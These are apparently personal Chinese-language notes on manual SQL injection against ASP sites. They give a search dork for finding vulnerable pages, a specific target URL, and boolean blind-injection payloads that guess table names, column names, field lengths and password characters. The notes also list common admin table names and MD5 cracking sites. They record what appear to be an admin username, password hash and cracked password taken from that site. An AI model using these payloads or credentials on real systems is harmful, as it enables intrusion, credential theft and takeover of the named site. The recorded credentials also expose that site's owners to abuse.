黑客注入之手工注入

先找注入点

inurl:asp?id=9
http://www.hsqs.com/tipsview.asp?id=9
猜表名 and (select count(*) from 表名)>0

猜列名 and (select count(列名) from 表名)>0

猜长度 and (select top 1 len(username) from admin)>5

username长 4

password长 16

猜内容 and (select top 1 asc(mid(password,1,1)) from admin)>50

asc码

username 120,117

__________________

www.md5.com.cn

www.xmd5.com

www.cmd5.com

猜表名 and (select count(*) from 表名)>0

猜列名 and (select count(列名) from 表名)>0

猜长度 and (select top 1 len(username) from admin)>5

username长 4

password长 16

猜内容 and (select top 1 asc(mid(password,1,1)) from admin)>50

asc码

username 120,117

常见表段

sysadmin admin administrator manger

[username] : hsqs1

[password] : 1f60163129f50b84 yingkesong1

______________

猜表名 and (select count(*) from sysadmin)>0

猜列名 and (select count(username) from sysadmin)>0

猜长度 and (select top 1 len(username) from sysadmin)>5

猜内容 and (select top 1 asc(mid(username,1,1)) from admin)>50

asc码

username 120,117

admin

username 5

password 16

104 115